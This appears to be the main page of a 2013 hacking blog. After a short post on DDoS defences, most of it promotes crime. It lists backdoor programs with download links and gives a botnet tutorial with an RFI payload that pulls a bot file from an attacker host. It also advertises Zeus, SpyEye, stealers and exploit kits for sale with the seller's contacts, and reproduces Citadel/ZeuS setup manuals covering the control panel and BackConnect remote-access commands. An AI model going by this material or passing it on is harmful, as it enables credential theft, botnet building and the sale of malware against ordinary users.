Sunday, September 29, 2013

8 Ways To Protect Your Website From DDoS Attack




1. Efficiency
DDoS is a war of attrition ? efficient use of resources is a key defence. Applications need to be designed from the ground up with efficiency in mind:

- well architected and designed
- efficient code and algorithms
- proper memory allocation and clean up
- configurable time outs and resource restrictions

====================================

2. Excess Capacity
If your site is running at 90% capacity with normal traffic ? it is a sitting duck for a DDoS attack.

The more excess capacity (throughput) you have the better ? cloud infrastructure that allows you to dynamically add capacity is ideal

====================================

3. Testing and Planning
DDoS attacks can be simulated as part of performance testing. Testing helps you to understand how your application bares the stresses of a DDoS ? so that you can plan a defence

====================================

4. Layer 4 Network Equipment
Switches and routers generally built in defences for layer 4 attacks.

Effective layer 4 defences include bogus IP filtering, traffic shaping, TCP splicing and rate limiting. Work with your ISP or network equipment vendor to understand the features of your network.

====================================

5. Bandwidth Management
Bandwidth management hardware allows you to classify incoming traffic as priority, regular or dangerous. It event of a DDoS attack non-priority requests can be dropped

====================================

6. Intrusion Detection Systems (IDS)
IDS look for attack patterns in incoming traffic and can drop suspicious packets.

====================================

7. Custom Defence
Many layer 7 attacks require a custom on-the-fly defence. Typically, web developers analyse traffic patterns for irregular:

- IPs
- request signatures
- http headers
- form parameters

Once a pattern is determined filters can be implemented on the web server to drop matching requests

====================================

8. Blackholing and Sinkholing
Severe DDoS attacks may require Blackholing ? sending all requests to a non-existent server. This brings the website down but relives the pressure on the server.

Sinkholing sends all requests to a logger that logs some statistics and then drops the requests. Sinkholing can help developers establish attack patterns
====================================
Posted by at No comments:

Top Most used Backdoor Programs





Using these programs any noob can remotely access your computer without any Authentication and do whatever he wants. I will tell you some of the features rest of them you need to try it and find out. These Programs :

=> Work as a key logger.
=> Send any Information from Victim?s PC to the Hacker?s PC.
=> Run any program on the Victims PC.
=> Display any Violating Image on victim?s Screen.
=> Open the CD Drive of the Victim?s PC.
=> Open any Web page on the Victims Screen.
=> Disable any Specific Key or whole Keyboard.
=> Shutdown Victim?s PC.
=> Start a Song on the Victim?s PC.etc.etc????..

Back Orifice / Back Orifice 2000

Back Orifice is one of the most common backdoor programs, and one of the most deadly. The name may seem like a joke, but sure, the threat is real. Back Orifice was established in Cult of the Dead Cow group. Back Orifice is an Open Source Program. The main Threat of this software is that by making some changes in the code anybody can make it undetectable to the Anti virus Program running on the Victim?s computer. Apart from the strange title, the program usually gets port 31337, the reference to ?Lit? phenomenon is popular among hackers.

Back Orifice uses a client-server model, while the server and client is the victim attacker. What makes Back Orifice so dangerous that it can install and operate silently. There is not required interaction with the user in, meaning you could its on your computer right now, and do not know.

Companies such as Symantec have taken steps to protect computers against programs that they consider dangerous. But even more attacks using Back Orifice 2000. This is due partly to the fact that it is still evolving, as open source. As stated in the documentation the goal is ultimately the presence of the Back Orifice 2000 unknown even to those who installed it.

Back Orifice 2000, developed for Windows 95, Windows 98, Windows NT, Windows 2000 and Windows XP.

Where can I download Back orifice 2000?

Back Orifice 2000 can be downloaded at the following address: http://sourceforge.net/projects/bo2k/

I infected! How do I remove it?

Removing Back Orifice 2000 may require that you change the registry settings. To remove it at 7 simple steps, refer to the diagram below.

How do I delete Back orifice 2000

1.Click Start> Run, and type ?Regedit?(without the quotes)
2.Follow the path below: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunServices ?
3.Now looking in the right box: ?The umgr32 = ?c: \ windows \ system \ umgr32.exe?
4.Right-click on this entry and click Remove. Now restart your computer.
5.After restarting only open Windows Explorer. Make sure you can see all registered extensions. To do so, select ?View Options and configure the appropriate settings.
6.Go to the WINDOWS \ SYSTEM directory, and find ?umgr32.exe? file. 7.Once you find it, delete it.
8.Exit Windows Explorer and reboot again.

NetBus / Netbus 2.0 Pro

NetBus was established around the same time that the Back Orifice was in the late 1990′s. NetBus was originally designed as a program prank friends and family, of course anything too malicious. However, the program was released in 1998, and is widely used as a backdoor to manage computer.

Like the Back Orifice, NetBus allows attackers to do virtually everything in the computer victim. It also works well under Windows 9x systems, as well as Windows XP. Unlike Back Orifice, the latest version of NetBus regarded shareware is not free. NetBus is also implementing less stealthy operations, as a direct result of criticism and complaints of abusive use.

Where can I buy and download NetBus?

NetBus can be purchased and downloaded at the following address: http://www.netbus.org/

Ok, I am infected. Now what?

Fortunately, the latest version of NetBus is a valid program. It can be removed just like any other program. Previous issuance NetBus is a bit more tricky, however. If you are not lucky enough attacked with the latest version, the withdrawal process and in the Back Orifice.

How do I remove NetBus?

1. Click Start> Run, and type ?Regedit ?(without the quotes)
2. Follow the path below: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunServices ?
3. Now, in the right box, looking as follows: ?[Name_of_Server].?Exe Of course, you have to find the actual name of this file EXE-. Usually This? Patch.exe ?or? SysEdit.exe ?, but may vary.
3. Reboot and remove all traces of the actual program, which can be left. 4. Additionally, you can set yourself NetBus, and then use its own function disposal.

SubSeven / Sub7

SubSeven or Sub7, has been established for the same purpose was to NetBus pranks. Sub7 actually has more support for pranks, and has more advanced users. Sub7 also widely used by the script kiddies, although that many firewalls and anti-virus software before initialization.

Since Sub7 not supported for several years, the threat is usually very low. Most security programs will not have any problem in ending Sub7 before it has a chance to be started. This shows that the importance to the modernization and security programs is critical, because the money was still there.

Nevertheless, it is widely used by those who have physical access to your firewall, or security programs. If access rights, the tool will work without restrictions.

Where can I buy and download Sub7?

Sub7 not supported more, and hence is not available for download on any legitimate websites. If you were to make a Google search, you would find links to download Sub7. However, this is not the official site, and should be considered dubious and dangerous.

Sounds harmless, How do I remove it?

End of the following processes through the curator: ?editserver.exe, subseven.exe?
Delete the following files: ?editserver.exe, subseven.exe, tutorial.txt.?
Why these programs is absolutely legitimate?

All the basis behind these programs is that they are designed to help people, not harm. While some like NetBus really were originally created for pranks, they switched routes to avoid legal problems.

These programs claim to be the legitimate remote desktop program, although they certainly easily used for malicious use. These programs really should be used to aid or customer support departments. Why all adolescents is to copy these programs goes beyond us, but leave the content of their networks, while computer is a good idea.

The advent of new technology has made these programs in some respects less effective. However, programs such as Back Orifice 2000, yet still evolving, so do not be surprised to learn that he works in the background, waiting for instructions. Since the best defense is a good offense, be sure to save a sharp eye on what is installed on the network computers. After all, an ounce of prevention is worth a pound of cure.
Posted by at No comments:

Botnet Tutorial


Hello Guy's

In this tutorial, i'll introduce how to build a botnet.
But I'm sure some of you've learned about botnets and i'll not go in details.




There are two main types of botnet.
1. Exe based botnet.
2. Http based botnet.

1.What is a Exe based botnet.???

As u already know, exe based botnet is very popular in hacking community.
There are so many source codes for the exe based botnets.
They need to compile and build an exe.
(That exe is a client and when the victim run that, his machine or his pc will join a channel of the IRC server)
After you create an exe, pack it, bind it and spread it on the net.
You can spread it by so many ways.
I'll post the exe based botnet video tutorials by watch guard network security later.
In summary, exe based bots are mainly used for windows machines.


2.What is a Http based botnet???


Http based bots are mostly php bot and perl bot.
None of them are exe bots.
They are used together with RFI or SQLi attacks.
When a site is backdoored with a shell.
The attacker upload a php and run it.
If so , the hacked site join to the IRC server and that site act as a zombie.
I'll show an example.

http://www.target.com/vul.php?hack_root=www.hacker.com/bot.txt???
It's the same method with RFI exploit.
When you inject the code like above, www.target.com will join to your server.
So, you need to find RFI vulnerable links to get or to collect so many zombies.
But, collecting RFI vulnerable links is not a difficult work.
You can use RFI scanner bots and can get thousand of RFI links.
When you get more than 200 sites, you can DDOS.
In summary, http botnet is mainly used for web servers.
It works on windows and linux server.

Hint : 200 zombies of http botnet may more powerful than 200 zombies of exe botnet.
Reason : The power of botnet depend on the number of IP and the zombie machine.

P.S --- you need to edit the php bot source code.
If somebody here has some problems to build a botnet, PM me.
I'll post in detail later.

Posted by at No comments:

Botnet Setup's


All Type Of Botnet services are available With Hosting Facilities and Installation facilities

BOTNETS

 Version of Ice9

 * ice9 1.2.5
* ice9 1.2.6

Versions of zeus

* Zeus v3
* zeus 2.1.0.1
* Zeus 2.0.8.9


versions of spyeye

* SpyEye v_1.3.45
* SpyEye v_1.1.39

IRC BOT'S

* Cyclone
* gBot v1 Builder
* gBot v2 Builder
* Silly Bot 1.4
* Insomnia Builder v2
* Insomnia Builder v1

STEALERS

* CRIMESTEALER
* iStealer 6.3 Legends
* Elite-Stealer 
* Crime24-Stealer
* ISR Stealer 0.4.1

EXPLOITS TOOLKIT

* CRIMEPACK v2
* CRIMEPACK v3
* BLACKHOLE
* PHOENIX EXPLOIT KIT LATEST
* X-Pack 
* Unique Pack
* IcePack-Platinum_Edition
* Bleeding Life v2
* Luiz Eleonore Exp 1.2
* FirePack




JDB's AVAILABLE NOW
FUD 100%


Some Pictures Of my service

 Ice9 


Zeus 



CRIMEPACK



NEW JDB's FUD AVAILABLE
SAMPLE ONE IS BELOW U CAN CHECK ON THE SPECIFIED WEBSITE



PHOENIX EXPLOIT KIT LATEST



SPYEYE WITH HOSTING FACILITIES



HOSTING FACILITIES



ZEUS INSTALLATION



CRIME STEALER




.contact us at :
skype id : suriya.cyber
yahoo messenger : cybersuriya73@yahoo.com

Posted by at No comments:

Saturday, September 28, 2013

Citadel Botnet Installation


Hi  Guys 


   Today i am going in to introduce new botnet is called CITADEL ZEUS BOTNET  its an latest version of ZEUS. Well u all aware about zeus if u have any doubt on zeus means u can check at this link




I will support your CITADEL PROJECT at any time and consult by any question about CITADEL.
and private exploit who interesting pm Me

yahoo messenger: cybersuriya@gmail.com
skype: suriya.cyber
gtalk: cybersuriya73@gmail.com



 Contents = 
============== 

1. Description and facilities. 
2. Setting up the server. 
2.1. HTTP-server. 
2.2. The interpreter PHP. 
2.3. MySQL-server. 
2.4. Control Panel. 
2.4.1. Setting. 
2.4.2. Update. 
2.4.3. File / system / fsarc.php. 
3. Setting Bot. 
4. Working with BackConnect. 

============================== 
= 1. Description and facilities. = 
============================== 
ICE9 - software to steal personal user data from remote systems, Windows. On 
plain language of "Troy", "backdoor", "virus". But the author does not like these words, therefore, further documentation 
He will call this software "Bot". 

Boat is fully based on the WinAPI Interception in UserMode (Ring3), this means that the bot does not use 
no drivers or downloads in Ring0. This feature makes it possible to run even from Bota 
Guest Account Windows. Plus, it ensures greater stability and adaptability 
subsequent versions of Windows. 

Bot is developed in Visual C + + version 9.0 +, with no additional libraries are used 
Type msvcrt, ATL, MFC, QT, etc. Bot code is written with the following priorities (in descending order): 
1. stability (carefully checked all the results of the call functions, etc.) 
2. size (to avoid duplication of algorithms, repetitive calls, functions, etc.) 
3. speed (not the type of instruction while (1 ){..}, for (int i = 0; i

Functions and features bot: 
1. Sniffer traffic for the protocol TCP. 
1.1. Interception of FTP logins on any port. 
1.2. Interception of POP3 logins on any port. 
1.3. The interception of any data from the traffic (a personal request). 

2. Intercepting HTTP / HTTPS requests to wininet.dll, ie all programs working with this 
library. This includes Internet Explorer (any version), Maxton, etc. 
2.1. Substitution .. 

3. The functions of the server. 
3.1 Socks4/4a/5. 
3.2 Bekkonekt for any services (RDP, Socks, FTP, etc.) on the infected machine. You can 
access to a computer that is behind a NAT, or, for example, that 
banned from the internet connection. 
3.3 Getting a screenshot of your screen in real time. 
- Do not add --- 


- 2.3. MySQL-server. -- 
---------------------- 
MySQL is required to store all data on botnete. The recommended version is not lower than 5.1.30, as well 
worth considering that when the control panel in the older versions have some 
problem. All table control panel, go to a MyISAM, it is important to optimize 
speed of work with this format, on the basis of the available server resources. 

We recommend the following changes to the MySQL-server setup (my or my.ini): 

max_connections = 2000 # Or higher 

Download MySQL: http://dev.mysql.com/downloads/


To nix-systems exhibit the right: 
. - 777 
/ system - 777 
/ tmp - 777



ALL FOR EDUCATION PURPOSE ONLY I AM NOT RESPONSE FOR ANY HARM FULL INFECTION OF SYSTEM ETC-


Posted by at No comments:

How to Setup Zeus Botnet Installation

I will support your ZeuS project any time and consult by any question about ZeuS.
and private exploit who interesting pm Me


yahoo messenger: cybersuriya73@yahoo.com.com

skype: suriya.cyber
gtalk: cybersuriya@gmail.com


================================================== =====
User's Guide 
*********************************** 

============== 
= Contents = 
============== 

1. Description and facilities. 
2. Setting up the server. 
2.1. HTTP-server. 
2.2. The interpreter PHP. 
2.3. MySQL-server. 
2.4. Control Panel. 
2.4.1. Setting. 
2.4.2. Update. 
2.4.3. File / system / fsarc.php. 
3. Setting Bot. 
4. Working with BackConnect. 
5. History. 
6. F.A.Q. 
7. Myths. 

============================== 
= 1. Description and facilities. = 
============================== 
ZeuS - software to steal personal user data from remote systems, Windows. On 
plain language of "Troy", "backdoor", "virus". But the author does not like these words, therefore, further documentation 
He will call this software "Bot". 

Boat is fully based on the WinAPI Interception in UserMode (Ring3), this means that the bot does not use 
no drivers or downloads in Ring0. This feature makes it possible to run even from Bota 
Guest Account Windows. Plus, it ensures greater stability and adaptability 
subsequent versions of Windows. 

Bot is developed in Visual C + + version 9.0 +, with no additional libraries are used 
Type msvcrt, ATL, MFC, QT, etc. Bot code is written with the following priorities (in descending order): 
1. stability (carefully checked all the results of the call functions, etc.) 
2. size (to avoid duplication of algorithms, repetitive calls, functions, etc.) 
3. speed (not the type of instruction while (1 ){..}, for (int i = 0; i



Functions and features bot: 
1. Sniffer traffic for the protocol TCP. 
1.1. Interception of FTP logins on any port. 
1.2. Interception of POP3 logins on any port. 
1.3. The interception of any data from the traffic (a personal request). 

2. Intercepting HTTP / HTTPS requests to wininet.dll, ie all programs working with this 
library. This includes Internet Explorer (any version), Maxton, etc. 
2.1. Substitution .. 

3. The functions of the server. 
3.1 Socks4/4a/5. 
3.2 Bekkonekt for any services (RDP, Socks, FTP, etc.) on the infected machine. You can 
access to a computer that is behind a NAT, or, for example, that 
banned from the internet connection. 
3.3 Getting a screenshot of your screen in real time. 
- Do not add --- 

========================= 
= 2. Setting up the server. = 
========================= 
The server is the central point of control botnetom, he was assembling reports bots 
and the impact of commands bots. It is not recommended to use the "Virtual Hosting" or "VDS", because 
with an increase botneta, the load on the server will increase, and this type of hosting is quite 
quickly exhausted their resources. You need a "Dedicated Server" (Dedik), the recommended minimum 
configuration: 

1. 2GB of RAM. 
2. 2x CPU frequency 2Ggts, 
3. SATA hard drive 7200rpm + 

For bot requires HTTP-server is connected with PHP + Zend Optimizer, and the MySQL-server. 

NOTE: For Windows-systems is very important to edit (create) the following registry value: 
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ Tcpip \ Parameters \ MaxUserPort = dword: 65534 
(decimal) 

--------------------- 
- 2.1. HTTP-server. -- 
--------------------- 
As an HTTP-server is recommended to use: for nix-systems - Apache from version 2.2, for 
Windows-systems - IIS from version 6.0. We recommend that you keep the HTTP-server on port 80 or 443 (this 
positive effect on otstuk bot, as providers / proxy can block access to other 
non-standard ports). 

Download Apache: http://apache.org/dyn/closer.cgi
Site IIS: http://www.iis.net/

--------------------------- 
- 2.2. The interpreter PHP. -- 
--------------------------- 
The latest version of the control panel designed for PHP 5.2.6. It is highly recommended 
use the version is not lower than this version. But in extreme cases of not less than 5.2. 

It is important to make the following settings in php.ini: 

safe_mode = Off 
magic_quotes_gpc = Off 
magic_quotes_runtime = Off 
memory_limit = 256M; or higher. 
post_max_size = 100M; or higher. 

and recommended to change the following settings: 

display_errors = Off 

Also need to add Zend Optimizer (acceleration of the script, and run the protected 
scripts). We recommend version 3.3. 

We do not recommend PHP to the server via the HTTP-CGI. 

Download PHP: http://www.php.net/downloads.php
Download Zend Optimizer: http://www.zend.com/en/products/guard/downloads

---------------------- 
- 2.3. MySQL-server. -- 
---------------------- 
MySQL is required to store all data on botnete. The recommended version is not lower than 5.1.30, as well 
worth considering that when the control panel in the older versions have some 
problem. All table control panel, go to a MyISAM, it is important to optimize 
speed of work with this format, on the basis of the available server resources. 

We recommend the following changes to the MySQL-server setup (my or my.ini): 

max_connections = 2000 # Or higher 

Download MySQL: http://dev.mysql.com/downloads/

--------------------------- 
- 2.4. Control Panel. -- 
--------------------------- 

2.4.1. Setting. 
***************** 
Appointment of files and folders: 
/ install - the installer. 
/ system - the system files. 
/ system / fsarc.php - a script to call an external archiver (section 2.4.3). 
/ system / config.php - config file. 
/ theme - the theme file (design), without Zend can freely change. 
cp.php - log into the control panel. 
gate.php - geyt for bots. 
index.php - empty file to prevent listing of files. 

The control panel is usually located in your folder in the distribution server [php]. All contents of this 
folder, you need to upload to the server in any directory accessible by HTTP. If you download it through 
FTP, all files you download in binary mode. 

To nix-systems exhibit the right: 
. - 777 
/ system - 777 
/ tmp - 777 

For Windows-systems: 
\ system - the right to full write, read only for users of the under which the access 
via HTTP. For IIS this is usually IUSR_ *. 
\ tmp - as well as for the \ system. 

Once all files are downloaded, you need a web browser to run the installer on the URL 
http://server/papka/install/index.php. Follow the instructions appeared, in the case of 
mistakes (you will be notified in detail) in the installation, check that all fields are correct, 
and correct installation of the rights to the folder. 

After installation, we recommend that you delete the directory install, and rename files cp.php (entrance to the 
panel) and gate.php (geyt for bots) in any files you want (change the extension 
not). 

Now you can safely enter into the control panel by typing in the browser URL renamed 
File cp.php. 

2.4.2. Update. 
****************** 
If you have a new copy of the control panel, and want to update an older version, the 
should do the following: 

1) Copy the files a new panel in place of old ones. 
2) Rename files cp.php and gate.php under their real names of your choice during installation 
the old control panel. 
3) In any case, the right to re-set the directory in accordance with paragraph 2.4. 
4) with a browser to run the installer for URL http://server/direktoriya/install/index.php, and 
appeared to follow the instructions. The process of the installer may take a fairly large 
period of time, this is due to the fact that some tables may be re-records. 
5) You can use the new control panel. 

2.4.3. File / system / fsarc.php. 
****************************** 
This file contains a function to call an external archiver. At this time, archive 
used only in "Reports:: Search in files" (reports_files), and is called to load 
Files and folders in a single archive. By default, set to archive Zip, and is 
universal for Windows and nix, so all you have to do is to install the system this 
archive, and to the right in its execution. You can also edit this file to work with 
any archiver. 

Download Zip: http://www.info-zip.org/Zip.html. 

====================== 
= 3. Setting Bot. = 
====================== 

=========================== 
= 4. Working with BackConnect = 
=========================== 
Working with BackConnect regarded as an example. 

IP BackConnect-server: 192.168.100.1 
Port for the bot: 4500 
Port for the client application: 1080 

1) Run the server application (zsbcs.exe or zsbcs64.exe) on the server has an IP in 
Internet application specifies the port, which is expected to connect from the bot, and the port to 
which will connect the client application. For example zsbcs.exe listen-cp: 1080-bp: 4500, 
where 1080 - the client port 4500 - port to the bot. 

2) the need Bota sent a team bc_add service server_host server_port, where the service -- 
port number or name * service, which needs to connect to the Bota. 

* currently only supported in the name of socks, which allows you to connect to the built-in 
Socks-bot server. 

server_host - a server that zapusheno server application. It can be used IPv4, 
IPv6, or domain. 
server_port - a port that is specified in the option cp server application. In this case, 4500. 

Example: bc_add socks 192.168.100.1 4500 - as a result you get the socks, 
bc_add 3389 192.168.100.1 4500 - as a result you get rdp. 

3) Now you need to wait for bot to connect to the server, in this period, any attempt to client 
applications to connect will be ignored (will disconnect the client). Badge 
connect bot will be output to the console server line "Accepted new conection from bot ...". 

4) After connecting the bot, you can work with their client. Ie you just 
connect to the server to the client port (in this case 1080). For example, if you gave 
team socks, a port on the client you will be expected to Socks-server, if port 3389, then 
you connect to 192.168.100:1080 as a normal RDP. 

5) After that, when you do not need BackConnect of the bot for a certain service, you must pay 
click bc_del service server_host server_port, where all the parameters must be identical 
parameters bc_add, which must be removed. You can also use the spec. characters 
'*' And '?'. 

For example: bc_del * * * - deletes all BackConnect'y This Bota. 
bc_del * 192.168 .* * remove all BackConnect'y, connect to the server with IP 192.168 .*. 
bc_del 3389 192.168.100.1 4500 - specifically removes one BackConnect. 

NOTES: 
1) You can specify any number of BackConnect'ov (ie bc_add), but they should not be shared 
combination of IP + Port. But if there is such a combination, will be launched first added. 
2) For each BackConnect'a, you must run a separate server application. 
3) if the connection (drop server drop bot, etc.), bot will repeat the connection 
to the server indefinitely (even after rebooting the PC), until BackConnect will not be removed 
(ie bc_del). 
4) As a service to bc_add, you can use any open port at the address 127.0.0.1. 
5) The server application supports IPv6, but in principle at the present time, this support is not particularly 
relevant. 
6) You can launch the server application under wine. Writing the same elf application is currently not 
planned. 
7) It is recommended to use the option bp popular application server ports (80, 8080, 
443, etc.), because other ports may be blocked by the provider which the bot. 
should not be allowed to connect to different bots on the same server port at the same time. 
9) The method of such a connection might be useful for bots, which are outside the NAT, because sometimes 
Windows firewall or ISP may be blocked from the Internet connection. 

NOTE: This feature is not available in all builds Bot. 

====================== 
= 5. History. = 
====================== 
Conditional tags: [*] - To change. 
[-] - A correction. 
[+] - Add. 

[Version 1.2.0.0, 20.12.2008] 
Overall: [*] No longer will the documentation in chm-file, everything will be written to this file. 
[+] Now the boat is able to receive commands not only with the sending status, but when sending 
files / logs. 
[+] Local data requests to the server and the configuration file is encrypted with the RC4 key to 
Your choice. [*] Fully updated protocol bot <-> server. Perhaps the diminished load on the server. 

Boat: 
[-] Fixed the bug that blocking bots on limited screen Windows. [*] Written a new PE-kriptor now PE-file is very accurate and the most 
simulates the results of the MS Linker 9.0. [*] Updated build process to bildere Bot. [*] Optimized compression of the configuration file. [*] The new format is a binary configuration file. [*] Rewritten the process of assembling the binary config file. [*] Socks and LC are now working on a port. 

Control Panel: [*] The status of the control panel, transferred to the BETA. [*] Changed all tables MySQL. [*] Nachet a gradual transfer of the Control Panel on the UTF-8 (may be temporary problems with 
displaying characters). [*] Updated geobaza. 

[Version 1.2.1.0, 30.12.2008] 
Boat: [*] BOFA Answers are now sent as BLT_GRABBED_HTTP (was BLT_HTTPS_REQUEST). 
[-] Small error when sending reports. 
[-] The size of the report could not exceed ~ 550 characters. 
[-] Error exists since the beginning of the bot: a low timeout for sending POST-requests 
resulting in a blocked sending long (more than ~ 1 Mb) Report on slow 
compounds (not stable), as the theoretical implications - bot altogether stopped sending 
Records. 

Overall: 
[+] In the case record and record type BLT_HTTP_REQUEST BLT_HTTPS_REQUEST field SBCID_PATH_SOURCE 
(in the table will path_source) added path URL. 

Control Panel: [*] Updated redir.php. 

[Version 1.2.2.0, 11.03.2009] 
Boat: 
[-] Fixed bug in HTTP-inzhektah exists for all versions of bot. When 
use in the asynchronous mode wininet.dll, was lost time 
synchronize flows generated wininet.dll, with the result that, under certain conditions 
been an exception. 
[+] By an HTTP-inzhekta now also change the files in the local cache. 
The absence of this refinement can not always activate HTTP-inzhektam. 
[+] Reduce the size of PE-file. 

[Version 1.2.3.0, 28.03.2009] 
Boat: 
[-] Minor bug in kriptore, thanks to the valiant govnoanalitikam from Avira. 

Overall: [*] Changed the protocol distribution teams bots. 

Control Panel: [*] Completely rewritten Control Panel. [*] Design rewritten to XHTML 1.0 Strict (for IE does not work). [*] Boat is now again able to receive commands only when sending a report on the online status 
(too high load). [*] Updated geobaza. 

[Version 1.2.4.0, 02.04.2009] 
Boat: 
[+] When using HTTP, the header User-Agent is now read by Internet Explorer, rather than 
is a constant as before. Theoretically, because of the constant User-Agent'a, queries 
providers may be blocked or fall under suspicion. 

Control Panel: 
[-] Fixed a bug displaying records containing characters 0-31 and 127-159. 

============= 
= 6. F.A.Q. = 
============= 
Q: What's the version numbers mean? 
A: a.b.c.d 
a - a complete change in your bot. 
b - the major changes that cause complete or partial incompatibility with previous 
versions. 
c - correct errors, refine, add features. 
d - the number of cleaning for the current version of antivirus abc 

Q: How does the generated Bot ID? 
A: Bot ID consists of two parts:% name% _% number%, where the name - the name of the computer (the result of 
GetComputerName), a number - a certain number that is generated on the basis of some unique operating system data. 

Q: Why is the traffic is encrypted using symmetric encryption (RC4), but not asymmetric (RSA)? 
A: Because the use of complex algorithms does not make sense, you need to encrypt only to hide 
traffic. Plus RSA only in terms of not knowing the key is in the Control Panel will not 
ability to emulate her answers. And what meaning is to defend this (globally 
view)? 

Q: I damaged tables / files panel, what should I do? 
A: Play the instructions specified in paragraph 2.5. 

=========== 
7. Myths = 
=========== 
M: ZeuS uses a DLL to work. 
A: False. There is only one executable PE file (exe). Dll, sys, etc. not when there was no 
vryatli will ever be. This myth has gone due to the fact that in some version for bot 
storage configuration used for files with such extensions. 

M: ZeuS uses COM (BHO) for the interception of Internet Explorer. 
A: False. Always use this for intercepting WinAPI of wininet.dll.
================================================== =====






Posted by at No comments:
Subscribe to: Posts (Atom)